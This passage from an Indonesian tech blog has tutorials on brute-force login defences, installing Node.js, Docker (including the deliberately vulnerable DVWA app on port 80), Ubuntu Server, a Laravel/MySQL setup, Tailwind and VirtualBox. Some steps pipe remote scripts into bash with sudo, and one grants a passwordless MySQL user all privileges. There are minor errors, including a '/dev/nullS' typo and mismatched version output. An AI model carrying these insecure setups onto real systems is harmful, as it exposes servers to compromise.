Namun, penguncian akun tidak selalu merupakan solusi terbaik, karena seseorang dapat dengan mudah menyalahgunakan tindakan keamanan dan mengunci ratusan akun pengguna. Seperti kejadian di beberapa web yang menyebabkan akun tidak bisa di akses.

Oleh karena itu ada beberapa alternatif seperti berikut :

Limit kesalahan password

Ketika user salah menginputkan password dalam 3x (atau berapa pun sesuai kebijakan masing-masing), maka ia harus menunggu beberapa waktu terlebih dahulu agar bisa melakukan login kembali.

Menambahkan CAPTCHA

CAPTCHA adalah suatu bentuk uji tantangan-tanggapan (challenge-response test) yang digunakan untuk memastikan bahwa jawaban tidak dihasilkan oleh robot (bot).

Pasang WAF

Untuk pengguna tingkat lanjut yang ingin melindungi akun mereka dari serangan, beri mereka opsi untuk mengizinkan login hanya dari alamat IP tertentu, atau menggunakan 2FA.

Sumber: https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks

Install Node.js dan NPM di Linux

Mon, 27 Dec 2021 00:00:00 GMT

Intro

Node Package Manager (NPM) merupakan pengelola package untuk JavaScript yang dapat memudahkan kita dalam mengelola package yang tersedia pada https://www.npmjs.com/. NPM merupakan standard package manager yang disediakan oleh Node.js dan sudah otomatis terpasang ketika memasang Node.js pada komputer kita. NPM dapat dioperasikan melalui CMD atau Terminal, kita pun sudah mencobanya ketika membuat proyek JavaScript.

Selain untuk membuat proyek JavaScript, NPM dapat digunakan untuk memasang atau menghapus third party module (modul pihak ketiga). Modul yang dipasang melalui NPM akan disimpan pada folder node_modules.

Terdapat dua tipe pemasangan modul melalui NPM: yakni global dan lokal. Bila modul dipasang secara global, maka modul tersebut akan bersifat layaknya core module dan dapat digunakan di mana pun. Sedangkan modul yang dipasang secara lokal hanya dapat digunakan pada cakupan project Node.js yang memasangnya saja.

Instalasi

1. Install Node.js dan npm dari Ubuntu repository

sudo apt update
sudo apt install nodejs npm

Perintah di atas akan menginstal sejumlah paket, termasuk alat yang diperlukan untuk mengkompilasi dan menginstal add-on asli dari npm. Setelah selesai, verifikasi instalasi dengan menjalankan:

nodejs --version
v16.14.0

npm --version
8.3.1

2. Install Node.js dan npm dari NodeSource

NodeSource adalah perusahaan yang berfokus pada penyediaan dukungan Node tingkat enterprise. NodeSource memelihara repositori APT yang berisi beberapa versi Node.js. Gunakan repositori ini jika aplikasi kita memerlukan versi Node.js tertentu.

Jalankan perintah berikut sebagai pengguna dengan hak sudo untuk mengunduh dan menjalankan script instalasi NodeSource:

sudo curl -sL https://deb.nodesource.com/setup_14.x | sudo -E bash -

script akan menambahkan signing key NodeSource ke sistem, membuat file repositori apt, menginstal semua paket yang diperlukan, dan merefresh cache apt. Jika membutuhkan versi Node.js lain, misalnya 12.x, ubah setup_14.x dengan setup_12.x.

Setelah repositori NodeSource diaktifkan, instal Node.js dan npm:

sudo apt install nodejs

Verifikasi bahwa Node.js dan npm berhasil diinstal dengan print versinya:

node --version
v16.14.0

npm --version
8.3.1

2. Install Node.js dan npm dari NVM

NVM (Node Version Manager) adalah bash script yang memungkinkan untuk mengelola beberapa versi Node.js per pengguna. Dengan NVM dapat menginstal dan menghapus versi Node.js apa pun yang ingin digunakan atau diuji.

Kunjungi halaman repositori nvm GitHub dan salin perintah curl atau wget untuk mengunduh dan menginstal script nvm:

curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.35.3/install.sh | bash

Jangan gunakan sudo karena akan mengaktifkan nvm untuk pengguna root.

Script akan mengkloning repositori proyek dari Github ke direktori ~/.nvm:

=> Close and reopen your terminal to start using nvm or run the following to use it now:

export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"  # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion"  # This loads nvm bash_completion

Seperti yang dikatakan output di atas, Kita harus menutup dan membuka kembali terminal atau menjalankan perintah untuk menambahkan jalur ke script nvm ke sesi shell saat ini.

Setelah script berada di PATH kita, verifikasi bahwa nvm telah diinstal dengan benar dengan mengetik:

nvm --version

0.35.3

Untuk mendapatkan daftar semua versi Node.js yang dapat diinstal dengan nvm, jalankan:

nvm list-remote

Untuk menginstal versi terbaru Node.js yang tersedia, jalankan:

nvm install node

Setelah instalasi selesai, verifikasi dengan mencetak versi Node.js:

node --version

Mari kita instal dua versi lagi, versi LTS terbaru dan versi 10.9.0:

nvm install --lts
nvm install 10.9.0

kita dapat membuat daftar versi Node.js yang diinstal dengan mengetik:

nvm ls

Jika kita ingin mengubah versi yang sedang aktif, gunakan perintah:

nvm use <versi_node>

contoh
nvm use 12.16.3

Output
Now using node v12.16.3 (npm v6.14.4)

Untuk mengubah versi Node.js default, jalankan perintah berikut:

nvm alias default <versi_node>

Untuk informasi lebih rinci tentang cara menggunakan script nvm, kunjungi halaman GitHub NVM project.

Install Docker pada Server

Sun, 26 Dec 2021 00:00:00 GMT

Intro

Docker adalah layanan yang menyediakan kemampuan untuk mengemas dan menjalankan sebuah aplikasi dalam sebuah lingkungan terisolasi yang disebut dengan container. Dengan adanya isolasi dan keamanan yang memadai memungkinkan untuk menjalankan banyak container di waktu yang bersamaan pada host tertentu.

Fitur-fitur docker

Docker engine digunakan untuk membuat image dan container.

Docker Hub adalah registry yang berisikan kumpulan dari image-image. Dengan menggunakan docker hub ini kita dapat mengumpulkan image. Hub ini berbeda dengan docker engine yang hanya membuat image.

Docker Compose adalah salah satu fitur unggulan yang berfungsi untuk menjalankan beberapa container atau biasa disebut multi-container sehingga dapat menghemat banyak waktu.

Docker for Mac fitur ini memungkinkan pengguna docker untuk menjalankan container pada sistem operasi Mac.

Docker for Linux fitur ini juga memungkinkan penggunanya untuk menjalankan container pada sistem operasi Linux.

Docker for Windows fitur ini memungkinkan penggunanya untuk menjalankan container pada sistem operasi windows.

Persiapan Instal Docker (Set up the repository)

Sebelum menginstal Docker Engine untuk pertama kalinya di mesin host baru, Kita perlu menyiapkan repositori Docker. Setelah itu, AKitanda dapat menginstal dan memperbarui Docker dari repositori.

Perbaharui package apt pada repository. Instal paket untuk memungkinkan apt menggunakan repositori melalui HTTPS

 $ sudo apt-get update
 $ sudo apt-get install \
     ca-certificates \
     curl \
     gnupg \
     lsb-release

Tambah GPG key official dari Docker:

$ curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg

Gunakan perintah berikut untuk mengatur repositori stable. Untuk menambahkan repositori nightly atau test, tambahkan kata nightly atau test (atau keduanya) setelah kata stable pada perintah di bawah ini. Pada kasus ini kita pakai versi stable dari docker.

$ echo \
  "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu \
  $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/nullS

Instal Docker Engine

Update apt, dan install versi terbaru dari Docker Engine dan kontainer, atau install versi spesifik dari Docker Engine yang diinginkan. Untuk menginstall versi stable gunakan perintah berikut:

$ sudo apt-get update
$ sudo apt-get install docker-ce docker-ce-cli containerd.io

Berikut adalah list repositori versi sebelumnya:

Untuk menginstall versi spesifik dari docker engine gunakan versi pada kolom kedua, contohnya 5:18.09.1~~3-0~~ubuntu-xenial.

$ sudo apt-get install docker-ce=<VERSION_STRING> docker-ce-cli=<VERSION_STRING> containerd.io

Tunggu hingga proses instalasi selesai. Kemudian gunakan perintah berikut untuk menambahkan ubuntu user ke docker group:

$ sudo usermod -aG docker $USER

Verifikasi user sekarang menjadi anggota grup dari docker dengan perintah:

$ id -Gn

Kemudian logout dari user saat ini.

Setelah itu login kembali dan coba jalankan perintah berikut untuk mengecek apakah docker berhasil terinstall

$ sudo docker run hello-world

Bonus

Install DVWA (Damn Vulnerable Web Application) dengan menggunakan docker. Pertama, pull terlebih dahulu image DVWA menggunakan perintah:

$ docker pull vulnerables/web-dvwa

Untuk melihat images apa saja yang ada gunakan perintah

$ docker images

Setelah itu gunakan perintah berikut untuk menjalankan DVWA menggunakan docker

$ docker run --rm -it -p 80:80 vulnerables/web-dvwa

perintah di atas akan menampilkan log pada terminal.
Jika tidak menginginkan log ditampilakn pada terminal bisa menambahkan parameter -d

$ docker run --rm -it -d -p 80:80 vulnerables/web-dvwa

Keterangan: —rm = secara otomatis menghapus kontainer.

—it = jika dipecah yaitu -i dan -t. -i digunakan untuk interaksi dengan container dan -t digunakan untuk mengalokasikan terminal.

-d atau -detach = Menjalankan container di backround.

-p = port yang ingin dipakai.

80:80 berarti port 80(HTTP) yang dipakai, jika ingin mengganti port misal ke port 9090 dapat diganti menjadi 9090:9090.

vulnerables/web-dvwa adalah nama image yang akan di jalankan.

Untuk melihat container apa yang sedang berjalan bisa gunakan perintah:

$ docker ps

untuk menghentikan atau menghapus container yang sedang berjalan gunakan perintah:

docker rm -f <CONTAINER ID>

contoh

docker rm -f 9967c341ae7b

Install Ubuntu Server

Sat, 25 Dec 2021 00:00:00 GMT

Intro

Server adalah sistem komputer yang menyediakan sumber daya untuk pusat penyimpanan data dan layanan khusus.

Penyimpanan data pada server biasanya dipakai untuk menyimpan dokumen dan informasi. Kemudian, data tersebut akan digunakan untuk melakukan berbagai layanan. Misalnya menampilkan website, menerima/mengirim email, dan lainnya.

Untuk kali ini saya mencoba untuk menginstal server Ubuntu 20.04 LTS. Untuk file ISO dapat didownload melalui link Ubuntu 20.04. Kemudian untuk VM yang menjalankan server tersebut menggunakan VMWare Workstation 16.

Persiapan Instal OS

Pertama buka VMWare kemudian pilih menu New Virtual Machine.

Kemudian pilih Typical dan Next

Untuk penginstalan yang lebih mudah pilih option kedua dan browse ISO image server Ubuntu. Baru klik Next.

Kemudian isi form yang ada.

Pada menu berikutnya isi nama dari virtual machine yang akan di install. Setelah itu browse lokasi instalasi. Kemudian klik Next.

Periksa kembali pilihan hardware yang akan di install. Kemudian check pada pilihan “Power on the virtual machine after creation”. Virtual machine akan otomatis berjalan. Setelah itu lanjut ke instalasi server.

Instal OS

Pilih bahasa yang di gunakan, disini saya pilih bahasa Inggris. Kemudian tekan Enter pada keyboard.

Pada menu selanjutnya. Saya memilih untuk Update installer.

Tunggu sampai proses update selesai.

Setelah proses update selesai, kita akan dihadapkan dengan pilihan keyboard yang akan kita gunakan. Untuk kasus saya, saya biarkan default yaitu English(US). Kemudian klik Done.

Kemudian setting Network. Biarkan default, dan ketik Done.

Untuk konfigurasi proxy biarkan kosong.

Untuk konfigurasi ubuntu archive mirror biarkan default.

Kemudian pada bagian storage configuration lihat pada gambar.

Klik Done.

Klik Continue.

Isikan Profile server.

Pada bagian ini biarkan kosong. klik Done.

Pada bagian SSH setup pilih install OpenSSH server. Untuk memilihnya pencet spasi. SSH server ini digunakan untuk akses ke server melalui device lain.

Pada bagian ini pilih aplikasi yang akan di instal di server. Pada kasus saya, saya biarkan kosong.

Tunggu sampai instalasi selesai.

Jika sudah selesai akan muncul pilihan Reboot Now. Klik Reboot Now, Nanti server akan otomatis reboot.

Menyiapkan Lingkungan Development Lokal Laravel di Linux (Ubuntu 20.04) 🐧

Wed, 22 Dec 2021 00:00:00 GMT

Intro

Sejak tahun 2020 saya gunakan Linux sebagai OS kedua saya setelah Windows. Memang sedikit susah untuk berpindah dari Windows ke Linux apabila sudah nyaman memakainya. Bisa dibilang menggunakan linux lebih “ribet” dibanding menggunakan windows. Kenapa? Karena yang pertama dan yang paling utama adalah ketika kita sudah bergantung dengan yang namanya aplikasi Office milik Microsoft, di Linux tidak ada aplikasi Microsoft Word, Microdoft Pwoer Point, dll. Namun ada aplikasi alternatif seperti Libre, Onlyoffice, WPS office, dll. Yang perlu penyesuaian serta kebanyakan tidak kompatible dengan beberapa format di aplikasi Microsoft Office. Selain tidak adanya Microsoft Office, Alasan selanjutnya adalah kita harus familiar dengan yang namanya CLI atau Command Line Interface. Yaitu kita menggunakan baris perintah untuk melakukan sesuatu contohnya seperti updade repository, upgrade system, dll. Namun semakin kesini banyak distro Linux yang mempemudah sehingga ramah untuk pengguna linux awal.

Oke masuk ke pembahasan, kita akan melakukan konfigurasi sebuah framework PHP yaitu Laravel versi 8. Kita akan menggunakan database MySQL dan PHP versi 7.3.

Install PHP

Tambahkan dan instal PHP 7.3 PPA repository

sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
sudo apt-get install php7.3

Verifikasi versi php yang sudah terinstal dengan perintah

php  -v

Output:

PHP 7.3.33-1+ubuntu20.04.1+deb.sury.org+1 (cli) (built: Nov 19 2021 06:25:05) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.3.33, Copyright (c) 1998-2018 Zend Technologies
   with Zend OPcache v7.3.33-1+ubuntu20.04.1+deb.sury.org+1, Copyright (c) 1999-2018, by Zend Technologies

Menginstal Modul PHP 7.3 yang Diperlukan

Laravel membutuhkan banyak modul. Anda dapat menginstalnya menggunakan perintah berikut:

sudo apt-get install php7.3 php7.3-cli php7.3-common php7.3-json php7.3-opcache php7.3-mysql php7.3-mbstring php7.3-mcrypt php7.3-zip php7.3-fpm php7.3-xml

Install MySQL Database

Jalankan perintah:

sudo apt-get install php7.3-mysql
sudo apt-get install mysql-server

Konfigurasi mysql dengan menjalankan perintah:

sudo mysql_secure_installation

Sekarang kita akan disajikan dengan beberapa petunjuk.

Untuk local dev environment, saya biarkan tidak memakai ’Validate Password Plugin’. Kita akan diminta memasukkan kata sandi untuk pengguna root. Dari sana hapus pengguna anonim, larang pengguna root dari akses jarak jauh, dan hapus test database. Ketika diminta untuk reload privilege tables pilih yes.

Buat Pengguna Non-root Dengan Hak Akses Root

sudo mysql -u root -p

Kemudian, jalankan perintah berikut untuk membuat userbaru bernama admin

CREATE USER 'admin'@'localhost' IDENTIFIED BY '';

GRANT ALL PRIVILEGES ON *.* TO 'admin'@'localhost' WITH GRANT OPTION;

FLUSH PRIVILEGES;

Selanjutnya keluar dari MySQL CLI

mysql> exit

Test pengguna baru dengan masuk sebagai admin tanpa menggunakan sudo.

mysql -u admin

Jika berhasil maka akan muncul

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 8.0.27-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>_

Keluar dari MySql dan kita akan melanjutkan untuk menginstal Composer.

mysql>exit

Untuk mengimport data dari file sql t(pastikan databse sudah dibuat terlebih dahulu) dan lakukan perintah berikut di terminal:

$ mysql -u USER -p NAMA_DATABASE < PATH/TO/FILE.sql

Untuk mengeceknya bisa masuk ke mysql dengan user tersebut

$ mysql -u USER


mysql> USE database_name;
mysql> SHOW tables;

Install Composer

Pertama, kita perlu memperbarui package manager kita.

sudo apt update

Sekarang kita akan menginstal beberapa dependensi yang diperlukan untuk instalasi Composer.

curl untuk mengunduh Komposer php-cli diperlukan untuk menjalankan instalasi php-mbstring menyediakan fungsi untuk perpustakaan yang digunakan git akan memungkinkan Composer mengunduh dependensi proyek unzip untuk membuka zip

sudo apt install curl php-cli php-mbstring git unzip

Dengan itu, kita dapat mengunduh installer Composer. Mulailah dengan pindah ke direktori home.

cd ~

Kemudian download installer Composer menggnakan curl.

curl -sS https://getcomposer.org/installer -o composer-setup.php

Sebelum kita instal kita perlu cek apakah installernya corrupt atau tidak serta memverifikasi bahwa installer yang kita download itu tidak di modifikasi dengan mengecek file Hash dan kita samakan dengan yang ada di webnya.

Buka Link https://composer.github.io/pubkeys.html dan temukan ‘Installer Checksum (SHA-384)’

Gunakan signature dan jalankan perintah berikut untuk memverifikasi installer yang sudah kita download.

HASH=isikan_hash_yang_ada_di_web

php -r "if (hash_file('SHA384', 'composer-setup.php') === '$HASH') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;"

Harusnya Outpus sebagai berikut:

Installer verified

jika tidak, kita harus download ulang installer dan melakukan langkah verifikasi lagi.

Jalankan Installer

Intall Composer secara global pada sistem.

sudo php composer-setup.php --install-dir=/usr/local/bin --filename=composer

Ketika sudah berhasil, ubah permission dari direktori composer

sudo chown -R $USER ~/.composer/

Verifikasi Bahwa Composer Sudah Terinstall

⚠️Jangan jalankan komposer sebagai root menggunakan sudo ️⚠️

jalankan

composer

Outputnya:

 ______
  / ____/___  ____ ___  ____  ____  ________  _____
 / /   / __ \/ __ `__ \/ __ \/ __ \/ ___/ _ \/ ___/
/ /___/ /_/ / / / / / / /_/ / /_/ (__  )  __/ /
\____/\____/_/ /_/ /_/ .___/\____/____/\___/_/
                    /_/
Composer version 2.2.1 2021-12-22 22:21:31

Mari Install Laravel

Unduh installer Laravel menggunakan Composer.

composer global require laravel/installer

Sekarang kita perlu memperbarui Linux $PATH

echo 'export PATH="$PATH:$HOME/.composer/vendor/bin"' >> ~/.bashrc

Setelah memperbarui $PATH tutup terminal dan buka yang baru.

Coba Hello, World

Mari jalankan aplikasi Laravel boilerplate di localhost kita. Pertama kita perlu membuat database yang akan kita sambungkan. Masuk ke MySQL melalui terminal menggunakan pengguna admin yang telah dibuat sebelumnya.

mysql -u admin

Kemudian buat database

CREATE DATABASE cobalaravel;

Buat project Laravel

laravel new coba-laravel

coba-laravel hanyalah nama aplikasi jadi beri nama apa pun yang kita suka.

Setelah ini selesai cd ke direktori baru untuk aplikasi Anda.

cd coba-laravel

Pada titik ini kita perlu memberi tahu aplikasi Laravel cara terhubung ke database kita.

Untuk ini kita akan mengedit file .env di root aplikasi.

sudo nano .env

Ubah pada bagian database dan sesuaikan dengan database kita menjadi seperti berikut:

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=cobalaravel
DB_USERNAME=admin
DB_PASSWORD=

Kemudian save.

Sekarang kita perlu menguji koneksi ke database. Untuk ini kita akan mengedit /routes/web.php Seharusnya terlihat seperti

Route::get('/', function () {
    try {
        DB::connection()->getPdo();
        $caught = false;
    } catch (Exception $e) {
        $caught = true;
        die("Could not connect to the database.  Please check your configuration. error:" . $e );
    }

    if(!$caught){
        echo 'Hello, world.';
    }
});

Sekarang jalankan server dengan perintah

php artisan serve

Output:

Laravel development server started: <http://127.0.0.1:8000>

Sekarang Anda dapat memeriksanya di browser http://127.0.0.1:8000 Kita akan melihat ‘Hello, world.’. tamopil di layar menandakan koneksi berhasil ke database.

Jika ada pesan error sebagai berikut

Illuminate\Database\QueryException : SQLSTATE[HY000] [2054] The server requested authentication method unknown to the client (SQL: select * from information_schema.tables where table_schema = ota_points and table_name = migrations)

Kita perlu masuk ke MySQL sebagai root kemudian jalankan

ALTER USER 'username-yang-digunakan-dilaravel'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';

Biarkan password kosong jika tidak ingin menggunakan password. Gunakan username ini di file env laravel kita untuk database MYSQL.

Semoga bermanfaat.

Deploy Project Tailwind ke Github Pages

Thu, 22 Jul 2021 00:00:00 GMT

Gimana Caranya?

Pertama, Buat repository baru di Github.

Kita perlu menginisiasi git pada project kita dengan mengetikkan perintah berikut di terminal

git init

Kita wajib install dependensi gh-pages dengan menjalankan perintah

npm install gh-pages

Selanjutnya kita perlu menambahkan file .gitignore di root project kita yang isinya sebagai berikut

Itu berarti folder node_modul tidak akan di push ke repository remote github kita.

Kemudian Kita juga perlu menambahkan Homepage di dalam file package.json yang merupakan repository kita.

"homepage": "https://mrizkitriyanto.github.io/tutorial-tailwinds/",

Setelah itu, kita juga perlu menambahkan script di dalam file package.json

"predeploy": "npm run build",
"deploy": "gh-pages -d public"

git remote add origin https://github.com/mrizkitriyanto/tutorial-tailwinds.git

Belom selesai gesss, kita harus commit pekerjaan kita terlebih dahulu. Dengan mengetikkan perintah

git add.

git commit -m "isi ini dengan komentar atau pesan commit apa saja yamg diubah"

Setelah itu, barulah kita bisa menjalankan perintah

npm run deploy

Push Code ke Remote Github

Selain deploy kita perlu push code kita, karena yang di deploy hanya folder public saja. Kalo kita ga push code kita ke github, kita akan kesusahan jika sewaktu waktu folder projet kita hilang atau ketika kita ingin pull code kita di laptop lain.

Jalankan perintah

git push -u origin master

atau

git push -u origin main

Sekian.

Purging Tailwind CSS

Wed, 21 Jul 2021 00:00:00 GMT

Apa itu Purge ?

Dalam proses development website, ukuran file yang dihasilkan tidak akan menjadi masalah karena semua dijalankan pada server lokal. Namun dalam proses produksi, ukuran file yang besar akan menjadi masalah serius karena akan sangat menghambat performa website, dimana ketika pengguna mengakses website kita (proses GET) akan memerlukan banya bandwitdth sehingga akan memperlambat.

Taiwindcss akan mengcompile semua style yang ada baik yang kita pakai maupun tidak ke dalam file hasil compile dan akan menghasilkan file CSS yang sangat besar. Untuk itu diperlukanlah proses purge, dimana akan mengcompile style yang kita gunakan saja. Sehingga hasil akhir akan jauh lebih kecil ukurannya.

Gimana Caranya?

Kita perlu menambahkan file yang akan kita purge di dalam file tailwind.config.js

purge: ['./public/**/*.html',],

Itu berarti tailwind akan menyesuaikan style apa saja yang digunakan file html di folder public. Sehingga style yang tidak digunakan akan dihapus dari file hasil “compile”

Kemudian Kita juga perlu menambahkan script di dalam file package.json

"build": "cross-env NODE_ENV=production postcss src/style.css -o public/stylehasil.css"

Sebelum menjalankan perintah build di terminal, Kita perlu instal yang namanya cross-env dengan menjalankan perintah

npm install --save-dev cross-env

Setelah itu, barulah kita bisa menjalankan perintah

npm run build

Cara Konfigurasi Tailwind CSS

Tue, 20 Jul 2021 00:00:00 GMT

Apa itu Tailwind?

Tailwind adalah CSS framework yang digunakan untuk mempermudah kita dalam styling website. Tailwind termasuk utility-based framework, berbeda dengan Bootstrap yang merupakan component-based framework. Apa bedanya? Bedanya, Bootstrap udah punya sebuah class yang sudah jadi (distyle), kemudian class tersebut bisa langsung dipakai disetiap elemnt HTML.Contohnya kita ingin membuat tombol berwarna biru dengan Bootstrap, kita hanya perlu mengetikkan.

&ltbutton class="btn btn-primary">
        ini button dengan Bootstrap
&lt/button>

Berbeda dengan Tailwind kita harus menuliskannya satu satu, Tailwind hanya menyingkat property CSS kita.

&ltbutton class="p-2 bg-blue-600 text-white rounded-md">
        ini button dengan Tailwind
&lt/button>

Gimana cara konfigurasi Tailwind?

Pastikan Node.js sudah terinstall di PC kita. Jika belum install Node.js terlebih dahulu. Selanjutnya buka command prompt atau bisa juga pakai terminal yang ada di dalam vscode. Pastikan kita berada di direktori project. Ketikkan:

$ npm init -y

Kemudian kita perlu install tailwindcss, postcss, autoprefixer dan postcss-cli.

$ npm install -D tailwindcss@latest postcss@latest autoprefixer@latest postcss-cli

Pada saat artikel ini dibuat, Tailwind CSS berada pada versi 2.2.4

Setelah itu, kita perlu membuat file postcss.config.js di dalam root project kita dan menambahkan ‘tailwindcss’ dan ‘autoprefixer’ ke PostCSS konfigurasi kita. Dengan meng-copykan code dibawah ini:

module.exports = {
        plugins: {
            tailwindcss: {},
            autoprefixer: {},
        }
}

Kemudian kita membuat file tailwind.config.js untuk mengkustomisasi dan ini sangat diperlukan. Kita bisa meembuat file ini secara otomatis dengan mengetikkan perintah berikut di terminal.

$ npx tailwindcss init

Itu akan membuat filetailwind.config.js yang isinya:

module.exports = {
        purge: [],
        darkMode: false, // or 'media' or 'class'
        theme: {
            extend: {},
        },
        variants: {},
        plugins: [],
}

ita perlu membuat folder src di dalam root project dan mengisi folder tersebut dengan file style.css dan memasukkan code berikut kedalam file style.css (nama file bebas bisa di sesuaikan).

@tailwind base;
@tailwind components;
@tailwind utilities;

Sebelum bisa digunakan kita perlu menambahkan script di package.json sebagai perintah untuk mengcompile file css kita dengan cara menambahkan script berikut,

"dev": "postcss src/style.css -o public/stylehasil.css"

src/style.css adalah styling dari tailwin yang belum dicokmpile

-o adalah output

public/stylehasil.css adalah tempat output hasil compile

Anda bebas dalam penamaan dan letak.

Jadi deh tailwind siap digunakan. Ketika kamu ingin mengcompile, kamu cukup menjalankan perintah berikut di terminal.

$ npm run dev

File dan folder akan otomatis dibuat.

Instal Visual Studio Code di Linux Menggunakan Flatpak

Wed, 14 Jul 2021 00:00:00 GMT

Intro

Flatpak adalah package management yang memungkinkan kita mendistribusikan, menginstal, dan mengelola perangkat lunak tanpa perlu khawatir tentang dependensi, runtime, atau distribusi Linux.

Cimana caranya?

Pertama-tama kita harus install flatpaknya dan menghubungkan repository flathub untuk dapat mendownload aplikasi yang ada di flatpak. Sekarang buka terminal terlebih dahulu kemudian ketikkan

$ sudo apt install flatpak -y

Setelah itu masukkan password.

Setelah selesai kemudian ketikan.

$ sudo flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo

Jika sudah. Restart mesin

Install Visual Studio Code

Buka web browser dan ketikkan https://flathub.org/home dan search Visual Studio Code

$ flatpak install flathub com.visualstudio.code

Copy dan paste-kan di terminal.

Tunggu hingga proses selesai.

Menginstal Linux di Windows ??

Mon, 12 Jul 2021 00:00:00 GMT

Intro

Linux merupakan OS yang open source, yang berarti siapapun bisa memilikinya dengan gratis. Linux juga dikenal dengan keandalannya dan ringan dibanding dengan Windows. Karena open source maka banyak orang yang mengembangkan OS ini sehingga sampai sekarang banyak distro Linux yang beredar, ada distro khusus untuk hacking, untuk devloper, untuk designer, ada juga distro untuk penggunaan sehari hari.

Bisakah menginstal Linux di laptop Windows kita? Jawabannya, bisa. Kita bisa menginstal OS tersebut dengan menggunakan Virtual Machine. Virtual Machine adalah Virtual Environtmentyang berfungsi sebagai komputer sistem virtual yang memiliki CPU, memory, network interface, dan storagenya sendiri.

Ada beberapa Virtual Machine yang bisa kita gunakan salah duanya yaitu VMware dan Virtualbox. Kali ini akan menggunakn Virtualbox sebagai contoh.

Yang perlu dipersiapkan

Jika belum menginstal Virtualbox bisa downlaod filenya di https://www.virtualbox.org/wiki/Downloads Downlaod file ISO Ubuntu di https://ubuntu.com/download Pastikan kamu mempunyai 2gb free memory ram dan paling tidak 16GB storage kosong.

Jika dirasa Ubuntu terlalu berat bisa menggunakan distro Xubuntu. Downlaod file ISO di https://xubuntu.org/download/ Xubuntu bisa digunakan dengan minimal memory 512 MB dan paling tidak 8GB storage.

Persiapan Instal OS

Klik New.

Isi nama sesuai yang kalian inginkan. Kemudian pilih folder tempat instalasi mesin. Pastikan Tipe dan Versionnya adalah Linux Ubuntu (64-bit). Sesuaikan memori dengan perangkat anda, Maksimal sebatash hijau.

Kemudian atur file size minimal 16GB. Sesuaikan dengan gambar dan klik Create.

Masuk ke menu setting (sebelah New). Atur CPU processornya menjadi 4 (sesuaikan dengan perangkat anda, maksimal sebatas hijau).

Kemudian masuk ke storage dan masukkan file ISO yang sudah di download. dan klik OK.

Instal OS

Setelah proses setting tadi selesai. Klik Start untuk menjalankan mesinnya. Setelah muncul seperti pada gambar, klik Install Ubuntu.

Secara default keyboard layout nya yaitu English(US). Setelah itu akan muncul seerti gambar diatas, silakan pilih normal Instalation. Jika ingin menginstal sekalian diupdate maka jangan lupa centang “Download updates while installing”. Kemudian klik continue.

Pada Instalation Type, pilih “Erase disk and Install Ubuntu”

Akan muncul pesan konfirmasi. Klik Continue

Pilih zona lokasi untuk menentukan time zone yang akan digunakan. Kemudian klik Continue. Sebelum masuk proses penginstalan kita diwajibkan untuk mengisi Nama kita, Nama komputer (Bebas mau di isi apa, Nama komputer ini digunakan ketika mesin kalian berkomunikasi dengan mesin yang lain seperti saat transfer file lewat network), useername dan password. Setelah selesai mengisi klik ”Continue”. Proses penginstalan akan berlangsung, butuh beberapa menit.

Ketika proses penginstalan selesai. Kita akan diminta untuk merestar mesin kita. Klik “restart”.

Selesai deh. Kita akan langsung diminta memasukkan password untuk mengakses aplikasi di dalamnya.

Installasi Virtualbox

Fri, 02 Jul 2021 00:00:00 GMT

Intro

Virtual Machine adalah Virtual Environtment yang berfungsi sebagai komputer sistem virtual yang memiliki CPU, memory, network interface, dan storagenya sendiri. Ada beberapa Virtual Machine yang bisa kita gunakan salah duanya yaitu VMware dan Virtualbox. Kali ini akan menggunakn Virtualbox sebagai contoh.

Yang perlu dipersiapkan

Jika belum mendownload Virtualbox bisa downlaod filenya di Web Virtualbox

Instal

Klik Next

Jika ingin mengganti letak penginstalan pilih browse dan pilih letaknya. Jika tidak bisa langsung klik Next.

Biarkan default dan klik Next

Kemudian klik Yes

Klik Install

Klik Finish

Selesai deh. Kita bisa pakai virtualbox ini untuk menginstal OS lain.

Selamat Mencoba…

TCP Socket Programming Menggunakan Python

Tue, 01 Jun 2021 00:00:00 GMT

Intro

Beberapa waktu yang lalu saya mendapatkan tugas dari dosen mata kuliah jaringan komputer. Tugas itu dikerjakan secara berkelompok yang terdiri dari 4 orang. Tugasnya adalah TCP dan UDP socket programming. Akhirnya kita membagi tugas, dan kebetulan saya dapat bagian TCP socket programming.

Apa itu TCP?

TCP atau Transmission Control Protocol adalah protokol komunikasi dalam computer networking. TCP berada pada layer transport atau layer ke 4 dari 7 OSI layer. Dalam TCP ada istilah yang namanya 3 Way Handshake. Istilah tersebut merupakan gimana cara berkomunikasi menggunakan TCP. Jadi gini, 3 Way Handshake dimulai dari SYN -> SYN ACK -> ACK

SYN (Synchronize Sequence Number) berarti client ingin membuat koneksi dengan server dengan mengirimkan SYN ke server yang menginformasikan bahwa klien kemungkinan akan memulai komunikasi.

SYN ACK berarti server merespon permintaan client. ACK (Acknowledgement) menandakan respon dari segmen yang diterimanya sedangkan SYN menandakan dengan nomor urut apa yang mungkin untuk memulai segmen.

ACK berarti client mengirim konfirmasi ke server bahwa client telah menerima SYN, dan keduanya membangun koneksi.

TCP vs UDP

TCP
- Definisi : TCP adalah communication-based protocol. Transmisi data terjadi dalam bentuk paket. TCP mencakup teknik pengecekan kesalahan, menjamin pengiriman data, dan menjaga urutan paket data dan informasi.
